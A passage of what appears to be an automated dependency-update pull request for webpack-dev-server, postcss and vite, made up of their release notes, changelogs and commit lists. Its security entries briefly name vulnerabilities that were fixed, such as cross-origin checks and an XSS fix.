href=\"https://github.com/webpack/webpack-dev-server/compare/v5.1.0...v5.2.0\"\u003e5.2.0\u003c/a\u003e (2024-12-11)\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadded \u003ccode\u003egetClientEntry\u003c/code\u003e and \u003ccode\u003egetClientHotEntry\u003c/code\u003e methods to get clients entries (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/dc642a832d45c23c5c7a08fbf29995e0db7e0d95\"\u003edc642a8\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003espeed up initial client bundling (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/145b5d01610a16468fc32719a20366682b0e8572\"\u003e145b5d0\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/webpack/webpack-dev-server/blob/main/CHANGELOG.md\"\u003ewebpack-dev-server's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.2...v5.2.3\"\u003e5.2.3\u003c/a\u003e (2026-01-12)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd \u003ccode\u003ecause\u003c/code\u003e for \u003ccode\u003eerrorObject\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5518\"\u003e#5518\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/37b033da2c48335178495a1987c469a26ef3de60\"\u003e37b033d\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ecompatibility with event target and universal target and lazy compilation  (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/574026c44b9c51f0bbd2f5a2836c54607289a071\"\u003e574026c\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eoverlay:\u003c/strong\u003e add ESC key to dismiss overlay (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5598\"\u003e#5598\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/f91baa8831e061e2998849966b8002b40b83fb07\"\u003ef91baa8\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eprogress indicator styles (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5557\"\u003e#5557\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/41a53a1accdb0a90785d82cbe8a079794eeed3c8\"\u003e41a53a1\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eupgrade selfsigned to v5\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.1...v5.2.2\"\u003e5.2.2\u003c/a\u003e (2025-06-03)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u0026quot;Overlay enabled\u0026quot; false positive (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/18e72ee3e57a6e7598a6c068c0ff7c7bb6a857f1\"\u003e18e72ee\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003edo not crush when error is null for runtime errors (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5447\"\u003e#5447\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/309991f947baa0354140b9930a9654ac792e20c4\"\u003e309991f\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eremove unnecessary header \u003ccode\u003eX_TEST\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5451\"\u003e#5451\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/64a6124bf1b4d158bb42a4341dd03121ae3759fa\"\u003e64a6124\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003erespect the \u003ccode\u003eallowedHosts\u003c/code\u003e option for cross-origin header check (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5510\"\u003e#5510\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/03d12141bf7be09dfb14e91e5c834ee63bd9a9a2\"\u003e03d1214\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.0...v6.0.0\"\u003e5.2.1\u003c/a\u003e (2025-03-26)\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ecross-origin requests are not allowed unless allowed by \u003ccode\u003eAccess-Control-Allow-Origin\u003c/code\u003e header\u003c/li\u003e\n\u003cli\u003erequests with an IP addresses in the \u003ccode\u003eOrigin\u003c/code\u003e header are not allowed to connect to WebSocket server unless configured by \u003ccode\u003eallowedHosts\u003c/code\u003e or it different from the \u003ccode\u003eHost\u003c/code\u003e header\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThe above changes may make the dev server not work if you relied on such behavior, but unfortunately they carry security risks, so they were considered as fixes.\u003c/p\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eprevent overlay for errors caught by React error boundaries (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5431\"\u003e#5431\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/8c1abc903ab444d9ce99e567b9a6c603e1ec06be\"\u003e8c1abc9\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003etake the first network found instead of the last one, this restores the same behavior as 5.0.4 (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5411\"\u003e#5411\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/ffd0b86b790d372f90e17aea92cfd9def83fee96\"\u003effd0b86\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.1.0...v5.2.0\"\u003e5.2.0\u003c/a\u003e (2024-12-11)\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadded \u003ccode\u003egetClientEntry\u003c/code\u003e and \u003ccode\u003egetClientHotEntry\u003c/code\u003e methods to get clients entries (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/dc642a832d45c23c5c7a08fbf29995e0db7e0d95\"\u003edc642a8\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003espeed up initial client bundling (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/145b5d01610a16468fc32719a20366682b0e8572\"\u003e145b5d0\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.0.4...v5.1.0\"\u003e5.1.0\u003c/a\u003e (2024-09-03)\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/b550a702bd4246d1724513b70de0bfbe6604672f\"\u003e\u003ccode\u003eb550a70\u003c/code\u003e\u003c/a\u003e chore(release): 5.2.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/9704dc52e3f696ae1446428c25882745e9b65cbb\"\u003e\u003ccode\u003e9704dc5\u003c/code\u003e\u003c/a\u003e chore: upgrade selfsigned to v5 and remove node-forge dependency (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5618\"\u003e#5618\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/92bf644784741e8ea5adaa4a1dc26f4d462f223d\"\u003e\u003ccode\u003e92bf644\u003c/code\u003e\u003c/a\u003e chore: bump express to update qs (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5621\"\u003e#5621\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/792b2f0bd13a3b93abf701fe3a5cf41ee16722f4\"\u003e\u003ccode\u003e792b2f0\u003c/code\u003e\u003c/a\u003e chore(deps-dev): bump the dependencies group with 4 updates (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5606\"\u003e#5606\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/6d587cab3e023675de2feedf81bcdfcec7d5b774\"\u003e\u003ccode\u003e6d587ca\u003c/code\u003e\u003c/a\u003e chore(deps): bump the dependencies group across 1 directory with 27 updates (...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/f91baa8831e061e2998849966b8002b40b83fb07\"\u003e\u003ccode\u003ef91baa8\u003c/code\u003e\u003c/a\u003e fix(overlay): add ESC key to dismiss overlay (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5598\"\u003e#5598\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/574026c44b9c51f0bbd2f5a2836c54607289a071\"\u003e\u003ccode\u003e574026c\u003c/code\u003e\u003c/a\u003e fix: compatibility with event target and universal target and lazy compilation\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/c53955de36d793345f203ae0f336bd885dd2efaa\"\u003e\u003ccode\u003ec53955d\u003c/code\u003e\u003c/a\u003e docs: remove unused files\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/efe0aea890ca45528ed4d61926aeb8f0d75b20d3\"\u003e\u003ccode\u003eefe0aea\u003c/code\u003e\u003c/a\u003e test: fix\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/b6bb50c5f172f8ce8fa7e1806d28c9b9bbb30d61\"\u003e\u003ccode\u003eb6bb50c\u003c/code\u003e\u003c/a\u003e chore(deps): update\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v4.15.1...v5.2.3\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eInstall script changes\u003c/summary\u003e\n\u003cp\u003eThis version modifies \u003ccode\u003eprepare\u003c/code\u003e script that runs during installation. Review the package contents before updating.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `postcss` from 8.4.31 to 8.5.15\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/postcss/postcss/releases\"\u003epostcss's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e8.5.15\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed declaration parsing performance (by \u003ca href=\"https://github.com/homanp\"\u003e\u003ccode\u003e@​homanp\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.14\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed custom syntax regression (by \u003ca href=\"https://github.com/43081j\"\u003e\u003ccode\u003e@​43081j\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.13\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed \u003ccode\u003epostcss-scss\u003c/code\u003e commend regression.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.12\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed reading any file via user-generated CSS.\u003c/li\u003e\n\u003cli\u003eAdded \u003ccode\u003eopts.unsafeMap\u003c/code\u003e to disable checks.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.11\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed nested brackets parsing performance (by \u003ca href=\"https://github.com/offset\"\u003e\u003ccode\u003e@​offset\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.10\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed XSS via unescaped \u003ccode\u003e\u0026lt;/style\u0026gt;\u003c/code\u003e in non-bundler cases (by \u003ca href=\"https://github.com/TharVid\"\u003e\u003ccode\u003e@​TharVid\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.9\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSpeed up source map encoding paring in case of the error.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.8\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed \u003ccode\u003eProcessor#version\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.7\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImproved source map annotation cleaning performance (by CodeAnt AI).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.6\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed \u003ccode\u003eContainerWithChildren\u003c/code\u003e type discriminating (by \u003ca href=\"https://github.com/Goodwine\"\u003e\u003ccode\u003e@​Goodwine\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.5\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed \u003ccode\u003epackage.json\u003c/code\u003e→\u003ccode\u003eexports\u003c/code\u003e compatibility with some tools (by \u003ca href=\"https://github.com/JounQin\"\u003e\u003ccode\u003e@​JounQin\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.4\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed Parcel compatibility issue (by \u003ca href=\"https://github.com/git-sumitchaudhary\"\u003e\u003ccode\u003e@​git-sumitchaudhary\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.3\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdded more details to \u003ccode\u003eUnknown word\u003c/code\u003e error (by \u003ca href=\"https://github.com/hiepxanh\"\u003e\u003ccode\u003e@​hiepxanh\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003cli\u003eFixed types (by \u003ca href=\"https://github.com/romainmenke\"\u003e\u003ccode\u003e@​romainmenke\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003cli\u003eFixed docs (by \u003ca href=\"https://github.com/catnipan\"\u003e\u003ccode\u003e@​catnipan\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.2\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed end position of rules with semicolon (by \u003ca href=\"https://github.com/romainmenke\"\u003e\u003ccode\u003e@​romainmenke\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.1\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed backwards compatibility for complex cases (by \u003ca href=\"https://github.com/romainmenke\"\u003e\u003ccode\u003e@​romainmenke\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5 “Duke Alloces”\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/postcss/postcss/blob/main/CHANGELOG.md\"\u003epostcss's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e8.5.15\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed declaration parsing performance (by \u003ca href=\"https://github.com/homanp\"\u003e\u003ccode\u003e@​homanp\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.14\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed custom syntax regression (by \u003ca href=\"https://github.com/43081j\"\u003e\u003ccode\u003e@​43081j\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.13\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed \u003ccode\u003epostcss-scss\u003c/code\u003e commend regression.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.12\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed reading any file via user-generated CSS.\u003c/li\u003e\n\u003cli\u003eAdded \u003ccode\u003eopts.unsafeMap\u003c/code\u003e to disable checks.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.11\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed nested brackets parsing performance (by \u003ca href=\"https://github.com/offset\"\u003e\u003ccode\u003e@​offset\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.10\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed XSS via unescaped \u003ccode\u003e\u0026lt;/style\u0026gt;\u003c/code\u003e in non-bundler cases (by \u003ca href=\"https://github.com/TharVid\"\u003e\u003ccode\u003e@​TharVid\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.9\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSpeed up source map encoding paring in case of the error.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.8\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed \u003ccode\u003eProcessor#version\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.7\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImproved source map annotation cleaning performance (by CodeAnt AI).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.6\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed \u003ccode\u003eContainerWithChildren\u003c/code\u003e type discriminating (by \u003ca href=\"https://github.com/Goodwine\"\u003e\u003ccode\u003e@​Goodwine\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.5\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed \u003ccode\u003epackage.json\u003c/code\u003e→\u003ccode\u003eexports\u003c/code\u003e compatibility with some tools (by \u003ca href=\"https://github.com/JounQin\"\u003e\u003ccode\u003e@​JounQin\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.4\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed Parcel compatibility issue (by \u003ca href=\"https://github.com/git-sumitchaudhary\"\u003e\u003ccode\u003e@​git-sumitchaudhary\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.3\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/eae46db765d752cf8f40c4fa2b0b85030079c43d\"\u003e\u003ccode\u003eeae46db\u003c/code\u003e\u003c/a\u003e Release 8.5.15 version\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/79508ffa59e42c02056aca61b88bc393c8b516c4\"\u003e\u003ccode\u003e79508ff\u003c/code\u003e\u003c/a\u003e Update CI actions\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/b128e2131288a411c6e28071d0929542c49e74eb\"\u003e\u003ccode\u003eb128e21\u003c/code\u003e\u003c/a\u003e Speed up declaration parsing by avoiding creating new array on each token\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/9825dca02c33cf610e2a842be767468b67fbecf9\"\u003e\u003ccode\u003e9825dca\u003c/code\u003e\u003c/a\u003e Fix code format\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/55789c865281e2be194fa5b4e41dd046be3a2307\"\u003e\u003ccode\u003e55789c8\u003c/code\u003e\u003c/a\u003e Update dependencies\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/84fbbe9009cb3cc3bbb4cc3a9b65d468f4844d95\"\u003e\u003ccode\u003e84fbbe9\u003c/code\u003e\u003c/a\u003e Install older pnpm action for old Node.js\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/9f860bd78ec1dbc4f0ae72d693f03f956baa38cb\"\u003e\u003ccode\u003e9f860bd\u003c/code\u003e\u003c/a\u003e Revert pnpm action for old Node.js\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/08771986d47359545f502e009763e223b66bfcf6\"\u003e\u003ccode\u003e0877198\u003c/code\u003e\u003c/a\u003e Update CI actions\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/b2d1a335cea818f8b27e5cfb90147648afe3e582\"\u003e\u003ccode\u003eb2d1a33\u003c/code\u003e\u003c/a\u003e Fix linter warnings\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/0700dac92283bc259977dff2743ca74a00f58267\"\u003e\u003ccode\u003e0700dac\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/postcss/postcss/issues/2088\"\u003e#2088\u003c/a\u003e from rootvector2/add-oss-fuzz-harness\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/postcss/postcss/compare/8.4.31...8.5.15\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `vite` from 4.4.9 to 4.5.14\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/vitejs/vite/blob/v4.5.14/packages/vite/CHANGELOG.md\"\u003evite's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003c!-- raw HTML omitted --\u003e4.5.14 (2025-04-30)\u003c!-- raw HTML omitted --\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: backport \u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19965\"\u003e#19965\u003c/a\u003e, check static serve file inside sirv (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19967\"\u003e#19967\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/commit/7739479\"\u003e7739479\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/19965\"\u003e#19965\u003c/a\u003e \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/19967\"\u003e#19967\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore: run format (\u003ca href=\"https://github.com/vitejs/vite/commit/99afb60\"\u003e99afb60\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003c!-- raw HTML omitted --\u003e4.5.13 (2025-04-10)\u003c!-- raw HTML omitted --\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: backport \u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19830\"\u003e#19830\u003c/a\u003e, reject requests with \u003ccode\u003e#\u003c/code\u003e in request-target (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19832\"\u003e#19832\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/commit/41f3819\"\u003e41f3819\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/19830\"\u003e#19830\u003c/a\u003e \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/19832\"\u003e#19832\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003c!-- raw HTML omitted --\u003e4.5.12 (2025-04-03)\u003c!-- raw HTML omitted --\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: backport \u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19782\"\u003e#19782\u003c/a\u003e, fs check with svg and relative paths (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19785\"\u003e#19785\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/commit/0a3dcf5\"\u003e0a3dcf5\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/19782\"\u003e#19782\u003c/a\u003e \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/19785\"\u003e#19785\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003c!-- raw HTML omitted --\u003e4.5.11 (2025-03-31)\u003c!-- raw HTML omitted --\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: backport \u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19761\"\u003e#19761\u003c/a\u003e, fs check in transform middleware (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19763\"\u003e#19763\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/commit/26e1764\"\u003e26e1764\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/19761\"\u003e#19761\u003c/a\u003e \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/19763\"\u003e#19763\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003c!-- raw HTML omitted --\u003e4.5.10 (2025-03-24)\u003c!-- raw HTML omitted --\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: backport \u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19702\"\u003e#19702\u003c/a\u003e, fs raw query with query separators (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19704\"\u003e#19704\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/commit/315695e\"\u003e315695e\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/19702\"\u003e#19702\u003c/a\u003e \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/19704\"\u003e#19704\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003c!-- raw HTML omitted --\u003e4.5.9 (2025-01-21)\u003c!-- raw HTML omitted --\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: \u003ccode\u003epreview.allowedHosts\u003c/code\u003e with specific values was not respected (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19246\"\u003e#19246\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/commit/0bc52e0\"\u003e0bc52e0\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/19246\"\u003e#19246\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: allow CORS from loopback addresses by default (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19249\"\u003e#19249\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/commit/8f63cd6\"\u003e8f63cd6\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/19249\"\u003e#19249\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003c!-- raw HTML omitted --\u003e4.5.8 (2025-01-20)\u003c!-- raw HTML omitted --\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: try parse \u003ccode\u003eserver.origin\u003c/code\u003e URL (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19241\"\u003e#19241\u003c/a\u003e) (\u003ca 